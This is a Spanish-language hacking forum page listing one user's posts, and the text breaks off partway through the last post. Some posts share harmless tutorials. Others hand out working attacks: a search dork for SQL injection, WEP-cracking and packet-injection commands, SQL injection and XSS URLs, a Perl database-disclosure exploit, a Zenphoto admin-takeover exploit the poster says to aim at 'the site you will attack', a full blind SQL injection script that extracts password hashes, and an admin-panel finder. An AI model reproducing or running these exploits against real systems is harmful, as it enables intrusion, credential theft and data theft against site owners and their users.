Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - juh

#1
Bueno mi escribi un texto de hacer del uso de nmap como crear nuestros propios scaneos e irlos probando segun nuestras necesidades y lo que necesitemos obtener.
No se las ago mas larga les dejo la descarga del pdf espero les sirva saludos comunidad.

http://www.megaupload.com/?d=3MXC7SXH

ONLINE:
http://www.scribd.com/doc/46083312/Advanced-and-Comprehensive-Use-of-Nmap



#2
cross_fuzz es increíblemente eficaz, pero molesto notoriamente entre documentos fuzzer DOM vinculante que ayudó a identificar un centenar de errores en todos los navegadores en el mercado - muchos de dichos errores de explotación - y sigue siendo la búsqueda de más.

El fuzzer debe mucho de su eficacia para la generación dinámica de muy largo liquidación secuencias de las operaciones de DOM en varios documentos, la inspección de los objetos devueltos, recursivamente en ellos, y crear referencias circulares nodo que las pruebas de tensión mecanismos de recolección de basura.

El algoritmo de cross_fuzz fuzzing:

1. Abrir dos ventanas con documentos de cualquier tipo (DOM-habilitado). Simple documentos HTML, XHTML, SVG, y son seleccionados al azar como objetivos por defecto - a pesar de cualquier otro, posiblemente en formato plug-in-compatibles podrían ser objeto en su lugar.

2. Rastrear jerarquía DOM del primer documento, recogiendo encontrado referencias a objetos para su uso posterior. Objetos visitadas y las referencias conseguidas etiquetados con una propiedad de inyección para evitar la repetición infinita, una lista negra de secundaria se utiliza para evitar que navegar fuera o descendente en la ventana principal. Crítico, arrastrando los pies al azar y el control fanout recursividad se utilizan para asegurar una buena cobertura.

3. Repita el rastreo DOM, al azar ajustar encontrado propiedades de los objetos estableciendo su valor a una de las referencias previamente grabado (o, con cierta probabilidad, a uno de un puñado de codificado "interesante" valores).

4. Repita el rastreo DOM, llamando al azar encontrado métodos del objeto. Parámetros de llamada son sintetizados utilizando referencias conseguidas y los valores "interesantes", como se señaló anteriormente. Si un método devuelve un objeto, su salida es posteriormente arrastrado y ajustado de manera similar.

5. Destruye aleatoriamente primer documento usando uno de los varios métodos posibles, la recolección de elementos de conmutación.

6. Realice el mismo conjunto de operaciones de rastreo y ajustar para el segundo documento, pero las referencias recogidas de utilizar el primer documento para sobrescribir propiedades y llamar a métodos en el segundo.

7. Al azar destruir las ventanas de documentos, realizar más de un porcentaje de las referencias recogidas en el ciclo fuzzing siguiente.

Este diseño puede hacer que inesperadamente difícil conseguir limpiar, determinista repro, en este sentido, en las versiones actuales de todos los navegadores afectados, todavía estamos viendo una colección de problemas difícil de alcanzar cuando se ejecuta la herramienta - y algunos no tan difícil de alcanzar. Creo que en este momento, una participación de la comunidad más amplia puede ser útil para localizar y resolver estos errores.

También creo que al menos una de las vulnerabilidades descubiertas por cross_fuzz puede ser conocida por terceros - que hace que obtener esta herramienta una prioridad.

Pueden descargar desde aca:
cross_fuzz

Mas informacion ACA.
#3
Laby es un juego bastante interesnate para alguns programadores en c, python y ruby en los sigientes videos enseñare como pasar todos los niveles de laby por simple diversion y ustedes pueden sacar otras soluciones les recuerdo que son en python saludos comunidad....

Canal youtube:
http://www.youtube.com/user/juhproyect

Niveles:

   1a
http://www.youtube.com/watch?v=j8CrRXjJUiI

   1b
http://www.youtube.com/watch?v=13gPiHWJnkM

   1c
http://www.youtube.com/watch?v=ETubQGyNsdA

   2a
http://www.youtube.com/watch?v=OSPBFafjKUI

   2b
http://www.youtube.com/watch?v=vNpfHtGUrmA

   2c
http://www.youtube.com/watch?v=5L1-7X0RXlQ

   3a
http://www.youtube.com/watch?v=B49udVRTj3Q

   3b
http://www.youtube.com/watch?v=EiptfKqf8yY

   4a
http://www.youtube.com/watch?v=dhWQ2RVztos

   4b
http://www.youtube.com/watch?v=u3kxQS_qLag

Bueno hay esta laby completo y resuelto DIVIERTANSE!
#4
Como seguramente sabes, las cosas estalló recientemente en ToorCon 12 con el lanzamiento de la tan mentada plugin de Firefox llamado Firesheep.

Hubo varias discusiones acerca de cómo mitigar gusta utilizando plug-ins de Firefox para forzar conexiones SSL (donde esté disponible). Microsoft también trató de asegurar Hotmail con SSL, pero un poco b0rked eso también.

Para la persona que uno en la izquierda mundial que no conoce, Firesheep permite a cualquier usuario de secuestrar a la perfección la sesión de red de otro usuario en la misma red local. Aunque estos ataques no son nuevos, la facilidad de uso presentada por Firesheep trajo secuestro de sesión a las masas.

BlackSheep, también un plugin de Firefox está diseñado para combatir Firesheep. BlackSheep se esta cayendo "falsa" la información de ID de sesión en el cable y luego monitorea el tráfico para ver si ha sido secuestrado. Mientras Firesheep es en gran parte pasiva, una vez que se identifica la información de sesión de un dominio blanco, que luego hace una solicitud con posterioridad a esa mismo dominio, utilizando la información de la sesión secuestrado con el fin de obtener el nombre del usuario secuestrado junto con una imagen de la persona, si está disponible. Esta es la petición de que BlackSheep identifica con el fin de detectar la presencia de Firesheep en la red. Cuando identificado, el usuario será el mensaje de advertencia siguiente:



Cabe señalar que Firesheep BlackSheep y no se puede instalar en la misma instancia de Firefox, ya que comparten gran parte de la misma base de código. Si desea ejecutar tanto Firesheep y BlackSheep en la misma máquina, que debe ser instalado por separado en los perfiles de Firefox.

Requisitos

Con el fin de instalar BlackSheep, necesita:

    * Mac OS X: 10.5 or newer on an Intel processor.
    * Windows: XP or newer. Install Winpcap first!
    * Firefox: 3.5 or newer. 32-bit only.
    * Linux : details here

Puedes descargar BlackSheep desde aqui:

blacksheep-latest.xpi

Mas informacio acerca del proyecto AQUI.


#5
Bueno aqui les dejo un video desmotrativo de como hacer un sql injection a los shopadmin.asp
y tambien les dejo el dork para que practiken!
dork:
inurl:"shopadmin.asp" "Shop Administrators only"

YouTube - shopadmin.asp
[youtube=425,350]http://www.youtube.com/watch?v=1z7iQIk1CxU[/youtube]
#6
Bueno el secreto sale en la descripcion del video y tambien en el mismo video y ahora si queda resuelto al 100% como inyectar con esta tarjeta despues de un arduo trabajo la pille jejej

[youtube=425,350]http://www.youtube.com/watch?v=RETcMOTOiZc[/youtube]
#7
Hacking Wireless / [AYUDA] 4965agn
16 Noviembre 2010, 06:46 AM
hola amigos bueno llego a mis manos un portatil con la intel 4965agn
y bueno e estado crackear un red sin clientes asociados les muestro y despues explico mi problema

ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
iwlist wlan0 scan

obtengo la lista de redes seleciono una y todo bla bla bla

****.conf
mi archivo que usare con wpa_supplicant contiene lo sigiente

network={
ssid="rodeo"
key_mgmt=NONE
wep_key0="123567890"
}

donde rodeo es la red a crackear

despues

airmon-ng start wlan0

despues lanzo airodump

airodump-ng -w dump  --ivs --bssid  F0:7D:68:8D:9A:2C -c 11 mon0

ahora viene lo interezante cuando uso wpa_supplicant

wpa_supplicant -c/home/cracker/wep.conf -Dwext -iwlan0

y esto me hace un blucle infinito y jamas se asocia bueno en el airodump marca que si se asocia pero al inyectar nada

inyecto
aireplay-ng -3 -x 1024 -g 1000000 -b F0:7D:68:8D:9A:2C -h 00:11:22:33:44:55 mon0

pero espero y nada lo e dejado hasta 1 hora y nada si tengo experiencia en esto pero no encuentro nada
ahora..
se me ocurrio que si en lugar de lanzar airodump-ng y aireplay-ng con la interfaz mon0 la lanzara con wlan0 y el wpa_supplicant con mon0 y SORPRESA wpa_supplicant me asocia a la prefeccion pero no consigo nada con el aireplay ni con airodump alguien que me pueda ayudar saludos y gracias por el tiempo
#8
Quiero aprender pruebas de penetración?

XSSer es una penetración de código abierto herramienta de prueba que automatiza el proceso de detección y explotación de inyecciones XSS contra diferentes aplicaciones.

Contiene varias opciones para tratar de eludir los filtros de algunos, y diversas técnicas especiales de inyección de código.

Nuevas características

    * Añadido "final inyecciones a distancia" opción
    * Ataque Flash Cruz!
    * Marco de la Cruz de secuencias de comandos
    * Datos inyecciones Protocolo de control de
    * Base 64 (rfc2397) de PoC
    * OnMouseMove de PoC
    * Navegador lanzador
    * Nuevas opciones de menú
    * Pre-comprobación del sistema
    * Cadenas rastreo clones
    * Más avanzado sistema de estadísticas
    * "Mana" resultados ouput

Puede descargar XSSer v1.0 aquí:

xsser-1.0.tar.gz

Mas informacion aqui.
#9
Se escribió acerca de esta herramienta en enero de 2009, cuando fue lanzado por primera vez, recientemente se ha convertido en v1.1 disponible para descargar.

El tiempo y asignador de ataque (también conocido como TA-Mapper) es una herramienta de estimación de esfuerzo para la evaluación de caja negra de seguridad (o prueba de penetración) de las aplicaciones. Esta herramienta proporciona una estimación más precisa cuando se compara con la estimación aproximada. probadores de penetración que siempre tienen dificultades para explicar / justificar los esfuerzos cargada (o se cita) a sus clientes pueden encontrar esta útil herramienta de poder calcular con mayor precisión los esfuerzos necesarios para el ensayo de penetración de aplicaciones.

¿Qué hay de nuevo en v1.1?

   1. El "Optimizar esfuerzo" opciones se proporciona para la corrección de avance / optimización de esfuerzos. Permite a los usuarios a optimizar aún más los esfuerzos por considerar los componentes de automatización como una parte del enfoque de la prueba.
   2. Informe se puede generar tanto en HTML y formato MS Excel (Más opciones de informe puedan surgir en la puesta en libertad más tarde)

Corrección de errores

    * Pocos errores cosméticos correcciones incluidas algunas cuestiones funcionales
    * Se ha solucionado el _silly_ valores de configuración personalizados seguido de actualización automática de los esfuerzos totales

Puede descargar TA-Mapper v1.1 aquí:

TA-Mapper%20v1.1.zip

Mas informacion aqui
#10
Este otro se los dejo son varioos exploits para asp

============================================
Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
============================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[+] Greatz : DaiMon
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : Gokhun ASP Stok v1.0
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
~Vulnerability Style : Multiple vulnerabilities
~Demo : http://www.site.com/asp/pages/main/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
======== SQL Injection =========

http://[Victim]/?eylemD=urunler&olayD=&islemD=duzenle&kimlikD=1+union+select+0,1,name,ctelephone,4,5,6+from+customers+where+Kimlik=2

==================================
======= Cross Site Scripting =====

http://[Victim]/?eylemD=hizmetlerimiz&olayD=digerhizmetlerimiz%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

==============================
Remote Database DisClosure Exploit
==========================


#!/usr/bin/perl -w
#
# Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit
# Coded: KnocKout
# Date: 26.09.2010
# Thanks: DaiMon, BARCOD3
#
 
 
 
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Vural Portal 2010 Remote Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* Gokhun ASP Stok v1.0 -> Remote Database Disclosure Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* msn :   knockoutr[at]msn[dot]com                                 *\n";
print "\* Special Thankz : DaiMon                                      *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="database/yb.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
#11
Bueno les dejo este otro para utilizarlo solo cambian
$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
lo que esta dentro de " "
y ponen la url de el sitio web que van a atacar!
<?php
/*
 
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/
 
Abysssec Inc Public Advisory
  
  
  Title            :  Zenphoto Config Update and Command Execute Vulnerability
  Affected Version :  Zenphoto <= 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.zenphoto.org
  
*/
 
 
$path "http://www.site.com/zenphoto" ."/" "zp-core/setup.php";
$new_mysql_user "abysssec";
$new_mysql_pass "absssec";
$new_mysql_host "abysssec.com";
$new_mysql_database "abysssec_database";
$new_mysql_prefix "zp_";
echo 
"<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>
 
<body>"
;
echo 
"Zen Photo Image Gallery 1.3 Reset admin Password <br>
    By : Abysssec @ Inc <br>www.Abysssec.com<hr>
    <form method='POST' action='
$path' >
    <input type=hidden name='mysql' value='yes'>
    <input type=hidden name='mysql_user' value='
$new_mysql_user'>
    <input type=hidden name='mysql_pass' value='
$new_mysql_pass'>
    <input type=hidden name='mysql_host' value='
$new_mysql_host'>
    <input type=hidden name='mysql_database' value='
$new_mysql_database'>
    <input type=hidden name='mysql_prefix' value='
$new_mysql_prefix'>
    After click on below , if target will can connect to your Mysql_Host :<br>
    You Must view 'GO !' Messege ...<br>
    Click on & wait ....
    <br> Then , You need to set your admin user and password.<br><hr>
    Upload file:<br>
    you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
    <input type=submit value='Send Your Setting '>
    </form>
    "
;
echo 
"</body></html>";
?>

#12
Les dejo mi humilde aporte de como instalar tor y vidalia en windows y hablo un poco sobre seguridad informatica y como funcionan los proxys espero les sirva a algunos saludos!

[youtube=425,350]http://www.youtube.com/watch?v=rjROf50MYLY[/youtube]
#13


wifite es creado para atacar a varios cifrados WEP y WPA de redes al mismo tiempo. Esta herramienta se puede personalizar para ser automatizada con sólo unos pocos argumentos y se puede confiar para funcionar sin supervisión.

Características

    * Clases por el poder de las metas (en dB); más grietas puntos de acceso primero
    * Todos los apretones de manos son una copia de seguridad WPA (para wifite.py 's directorio de trabajo)
    * Opciones de mediados de ataque: parada durante el ataque con Ctrl C para utilizar (continuar, pasar al siguiente objetivo, pase a la ruptura, salida)
    * Numerosos filtros para especificar exactamente qué ataque (WEP / WPA / tanto, por encima de ciertos puntos fuertes de la señal, canales, etc)
    * Muy ajustes personalizables (tiempos de espera, los paquetes / seg, etc)
    * Apoyo SKA (no probado)
    * Encuentra dispositivos en modo monitor, si no se encuentra ninguno, le pide para la selección
    * Todas las contraseñas guardadas para log.txt
    * Conmutación ataques WEP no restablece IVS
    * Muestra resumen de la sesión en la salida; muestra las claves del agrietado

Descarga:

wifite
   
#14
#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew
# Web Site: www.warwolfz.org

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "

E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit

+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
\r\n";

if (@ARGV != 4) {
    print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
    exit;
}

my $host    = $ARGV[0];
my $usr     = $ARGV[1];
my $pwd     = $ARGV[2];
my $anickde = $ARGV[3];
my $anick   = '0x'.EncHex($anickde);

print "[!] Logging In...\r\n";

my %postdata = (
    uname => "$usr",
    pass => "$pwd",
    op => "login"
);
my $cookies = HTTP::Cookies->new(
    autosave => 1,
);

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$ua->cookie_jar($cookies);

my $req     = (POST $host."/user.php", \%postdata);
my $request = $ua->request($req);
my $content = $request->content;
if ($content =~ /<h4>Benvenuto su/i) {
    print "[+] Logged in!\r\n";
} else {
    print "[-] Fatal Error: username/password incorrect?\r\n";
    exit;
}

print "[!] Checking permissions...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$req = $host."/modules/eCal/location.php?lid=1+AND+1=1";
$ua->cookie_jar($cookies);
$request    = $ua->get($req);
$content    = $request->content;
if ($content !~ /<b>Eventi nella località: <\/b>/ig) {
    print "[+] Fatal Error: Access denied\r\n";
    exit;
} else {
    print "[+] You have permissions\r\n";
}

print "[!] Exploiting...\r\n";
my $i = 1;
my $pwdchr;
while ($i != 33) {
    my $wn  = 47;
    while (1) {
        $wn++;
        my $ua = LWP::UserAgent->new;
        $ua->agent("Mozilla 5.0");
        my $req     = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
        $ua->cookie_jar($cookies);
        my $request = $ua->get($req);
        my $content = $request->content;
        open LOGZZ, '>lol.html';
        print LOGZZ $content;
        close LOGZZ;
        if ($content !~ /<b>Eventi nella località: <\/b><a href='localleve\.php\?lid='>/ig) {
            my $cnt = $1;
            $pwdchr .= chr($wn);
            $^O eq 'MSWin32' ? system('cls') : system('clear');
            PrintChars($anickde, $pwdchr);
            last;
        }
    }
    $i++;
}

print "\r\n[!] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.org\r\n\r\n";

sub PrintChars {
    my $anick1 = $_[0];
    my $chars = $_[1];
print "

E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit

+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+

[!] Logging In...
[+] Logged in!
[!] Checking permissions...
[+] You have permissions
[!] Exploiting...
[+] ".$anick1."'s md5 Password: ".$chars."
";
}

sub EncHex {
    my $char = $_[0];
    chomp $char;
    my @trans = unpack("H*", "$char");
    return $trans[0];
}


#[Unit-X] Vuln-X DB 2010.09.21
#15
'''
  __  __  ____         _    _ ____
|  \/  |/ __ \   /\  | |  | |  _ \
| \  / | |  | | /  \ | |  | | |_) |
| |\/| | |  | |/ /\ \| |  | |  _ <
| |  | | |__| / ____ \ |__| | |_) |
|_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-25-visualsite-cms-multiple-vulnerabilities/
 
'''

Abysssec Inc Public Advisory
 
 
  Title            :  VisualSite CMS Multiple Vulnerabilities
  Affected Version :  VisualSite 1.3
  Discovery        :  www.abysssec.com
  Download Links   :  http://sourceforge.net/projects/visualsite/
  Login Page       :  http://Example.com/Admin/Default.aspx
 
Description :
===========================================================================================     
  This version of Visual Site CMS have Multiple Valnerabilities :
        1- Logical Bug for Lock Admin's Login
        2- Persistent XSS in admin section


Logical Bug for Lock Admin's Login:
===========================================================================================   

  If you enter this values in Login Page (http://Example.com/Admin/Default.aspx)
  three times during five minutes , the Admin's login will be locked:

    Username : 1' or '1'='1
    Password : foo
   

  Vulnerable Code is in this file:
                ../App_Code/VisualSite/DAL.cs
  Ln 378:
                public static User GetUser(string username)
            {
                  User result = null;
                  DataTable matches = ExecuteRowset(String.Format("SELECT [ID], [Username], [Password], [LockedDate] FROM [User] WHERE [Username] = '{0}'", Sanitise(username)));
                  if (matches != null && matches.Rows.Count > 0)
                   {
                     ...
                   }
                  return result;
                 }



Persistent XSS in admin section:
===========================================================================================   
  In Edit Section which is accessible to Admin, it is possible to enter a script in Description field
  that only executed in the following path and never executed in other situations:

     http://Example.com/SearchResults.aspx?q={}


===========================================================================================
#16
Bueno lo prometido es deuda aqui me tome el tiempo de empezar con los videos tutoriales de como aprender python facil desde 0 echo por mi obvio sucribance a mi canal y bueno comenten no les cuesta nada y poco a poco ire haciendo mas videos saludos a la comunidad hay ta mi granito de arena!

Les dejo el link de mi canal hay pueden chekar todos los videos quevaya subiendo
y sucribirse!!! Saludos a toda la comunidad!

http://www.youtube.com/user/juhproyect
#17
Hola gente soy nuevo en esta comunidad y por lo mismo quiero que vayan conosiendome y bueno propongo hacer unos videos tutoriales para enseñarles a programar en python que opinan ???saludos a todos!
#18
Scripting / [Perl]Admin Control Panel Finder V1
20 Septiembre 2010, 07:35 AM
#!/usr/bin/perl

##
#  By GlaDiaT0R
#  Admin Control Panel Finder   ___   Version 1 
# Home: Darkgh0st.com
##

use HTTP::Request;
use LWP::UserAgent;

system('cls');
system('title Admin Control Panel Finder v1 final I[C]oded by Gladiator from H4ckCr3w.net');

print"\n";
print "-----------------------------------------------\n" ;
print "[*]--Admin Control Panel Finder v 1 --------[*]\n" ;
print "[*]-------------Coded By GlaDiaT0R----------[*]\n" ;
print "[*]-------------From Darkgh0st.com---------[*]\n" ;
print "[*]------------Greetz to Allah--------------[*]\n" ;
print "*******************************************\n" ;
print "\n";

print "~# enter site to scan\n* ex: www.domaine.com ou www.domaine.com/path\n-> ";
$site=<STDIN>;
chomp $site;

print "\n";
print "~ Enter coding language of the website \n* ex: asp, php, cfm\n-> ";
$code=<STDIN>;
chomp($code);

if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
print "\n";

print "->Le site: $site\n";
print "->Source du site: $code\n";
print "->Scan de l'admin control panel en cours...\n\n\n";

if($code eq "asp"){

@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
);

foreach $ways(@path1){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Found -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
}




# -------------------------------------------------------
# -------------------test cfm ---------------------------|
# -------------------------------------------------------





if($code eq "cfm"){

@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
);

foreach $ways(@path1){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Found -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
}





# -------------------------------------------------------
#--------------------------/test-------------------------|
# -------------------------------------------------------


if($code eq "php"){

@path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
